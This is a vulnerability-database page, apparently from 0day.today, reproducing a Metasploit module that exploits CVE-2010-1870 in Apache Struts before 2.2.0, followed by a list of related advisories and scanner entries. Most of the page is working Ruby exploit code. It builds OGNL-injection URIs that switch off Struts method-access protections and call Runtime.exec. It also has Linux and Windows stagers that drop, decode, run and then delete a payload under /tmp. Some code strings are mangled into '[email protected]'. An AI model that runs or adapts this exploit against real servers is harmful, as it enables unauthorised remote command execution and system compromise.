Lucene search
Metasploit1337DAY-ID-16723HistoryAug 19, 2011 - 12:00 a.m.
Apache Struts < 2.2.0 Remote Command Execution
2011-08-1900:00:00
metasploit
0day.today
13
Exploit for multiple platform in category remote exploits
##
# $Id: struts_code_exec.rb 13586 2011-08-19 05:59:32Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts < 2.2.0 Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in
Apache Struts versions < 2.2.0. This issue is caused by a failure to properly
handle unicode characters in OGNL extensive expressions passed to the web server.
By sending a specially crafted request to the Struts application it is possible to
bypass the "#" restriction on ParameterInterceptors by using OGNL context variables.
Bypassing this restriction allows for the execution of arbitrary Java code.
},
'Author' =>
[
'bannedit', # metasploit module
'Meder Kydyraliev', # original public exploit
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13586 $',
'References' =>
[
[ 'CVE', '2010-1870'],
[ 'OSVDB', '66280'],
[ 'URL', 'http://www.exploit-db.com/exploits/14360/' ],
],
'Platform' => [ 'win', 'linux'],
'Privileged' => true,
'Targets' =>
[
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DisclosureDate' => 'Jul 13 2010',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
], self.class)
end
def execute_command(cmd, opts = {})
uri = Rex::Text::uri_encode(datastore['URI'])
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(2)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
var_e = rand_text_alpha_lower(4)
uri << "?(%27\\u0023_memberAccess[\\%27allowStaticMethodAccess\\%27]%27)(#{var_a})=true&"
uri << "(aaaa)((%27\\u0023context[\\%27xwork.MethodAccessor.denyMethodExecution\\%27]\\u003d\\u0023#{var_c}%27)(\\u0023#{var_c}\\u003dnew%20java.lang.Boolean(\"false\")))&"
uri << "(#{var_b})((%27\\u0023#{var_d}.exec(\"CMD\")%27)(\\u0023#{var_d}\\[email protected]@getRuntime()))=1" if target['Platform'] == 'win'
uri << "(asdf)(('\\u0023rt.exec(\"CMD\".split(\"@\"))')(\\u0023rt\\[email protected]@getRuntime()))=1" if target['Platform'] == 'linux'
uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
vprint_status("Attemping to execute: #{cmd}")
resp = send_request_raw({
'uri' => uri,
'version' => '1.1',
'method' => 'GET',
}, 5)
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")
execute_command(@payload_exe)
end
def linux_stager
cmds = "/bin/[email protected]@echo LINE | tee FILE"
exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
base64 = Rex::Text.encode_base64(exe)
base64.gsub!(/\=/, "\\u003d")
file = rand_text_alphanumeric(4+rand(4))
execute_command("/bin/[email protected]@touch /tmp/#{file}.b64")
cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
base64.each_line do |line|
line.chomp!
cmd = cmds
cmd.gsub!(/LINE/, line)
execute_command(cmds)
end
execute_command("/bin/[email protected]@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
execute_command("/bin/[email protected]@chmod +x /tmp/#{file}")
execute_command("/bin/[email protected]@rm /tmp/#{file}.b64")
execute_command("/bin/[email protected]@/tmp/#{file}")
@payload_exe = "/tmp/" + file
end
def on_new_session(client)
if target['Platform'] == 'linux'
print_status("deleting #{@payload_exe} payload file")
execute_command("/bin/[email protected]@rm #{@payload_exe}")
else
print_status("Windows does not allow running executables to be deleted")
print_status("delete the #{@payload_exe} file manually after migrating")
end
end
def exploit
if not datastore['CMD'].empty?
print_status("Executing user supplied command")
execute_command(datastore['CMD'])
return
end
case target['Platform']
when 'linux'
linux_stager
when 'win'
windows_stager
else
raise RuntimeError, 'Unsupported target platform!'
end
handler
end
end
# 0day.today [2018-01-01] #Related
vmware
vmware
seebug
seebug
Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability
2010-07-15 00:00:00
Struts2/XWork < 2.2.0 - Remote Command Execution Vulnerability
2014-07-01 00:00:00
VMware vCenter Orchestrator和Alive Enterprise远程代码执行漏洞
2011-05-10 00:00:00
osv
osv
Server side object manipulation in Apache Struts
2022-05-13 01:14:26
saint
saint
Apache Struts2 XWork ParameterInterceptor security bypass
2010-08-05 00:00:00
Apache Struts2 XWork ParameterInterceptor security bypass
2010-08-05 00:00:00
Apache Struts2 XWork ParameterInterceptor security bypass
2010-08-05 00:00:00
checkpoint_advisories
checkpoint_advisories
openvas
openvas
Struts Remote Command Execution Vulnerability
2010-09-10 00:00:00
Apache Struts Security Update (S2-005) - Active Check
2010-12-21 00:00:00
Apache Struts2/XWork Remote Command Execution Vulnerability
2010-12-21 00:00:00
exploitpack
exploitpack
Struts2XWork 2.2.0 - Remote Command Execution
2010-07-14 00:00:00
nessus
nessus
Apache Struts 2.x < 2.2.1 OGNL RCE (S2-005)
2018-09-10 00:00:00
Apache Struts 2 / XWork Remote Code Execution (safe check)
2010-07-29 00:00:00
exploitdb
exploitdb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)
2011-08-19 00:00:00
Struts2/XWork < 2.2.0 - Remote Command Execution
2010-07-14 00:00:00
packetstorm
packetstorm
Apache Struts < 2.2.0 Remote Command Execution
2011-08-19 00:00:00
Struts2/XWork Remote Command Execution
2010-07-14 00:00:00
cisco
cisco
Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
2014-07-09 16:00:00
zdt
zdt
Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability
2010-07-14 00:00:00
LISTSERV Maestro 9.0-8 Remote Code Execution Vulnerability
2020-10-21 00:00:00
nuclei
nuclei
ListSERV Maestro <= 9.0-8 RCE
2021-07-01 19:14:33
d2
d2
DSquare Exploit Pack: D2SEC_STRUTS
2010-08-17 20:00:00
github
github
Server side object manipulation in Apache Struts
2022-05-13 01:14:26
metasploit
metasploit
Apache Struts Remote Command Execution
2012-03-21 21:43:21
dsquare
dsquare
Apache-Struts < 2.2.0 RCE Windows
2012-01-26 00:00:00
Apache-Struts < 2.2.0 RCE Linux
2012-01-26 00:00:00
nvd
nvd
CVE-2010-1870
2010-08-17 20:00:03
prion
prion
Design/Logic Flaw
2010-08-17 20:00:00
canvas
canvas
Immunity Canvas: STRUTSCODEINJECTION
2012-01-08 15:55:00
cve
cve
CVE-2010-1870
2010-08-17 20:00:03
ubuntucve
ubuntucve
CVE-2010-1870
2010-08-17 00:00:00
cvelist
cvelist
CVE-2010-1870
2010-08-17 17:31:00
ibm
ibm
Security Bulletin: Order Management could be subject to multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x.
2024-04-12 17:35:43
wallarmlab
wallarmlab
New Struts2 Remote Code Execution exploit caught in the wild
2017-03-09 00:15:54
kitploit
kitploit
Vulmap - Web Vulnerability Scanning And Verification Tools
2020-12-25 11:30:00
Related for 1337DAY-ID-16723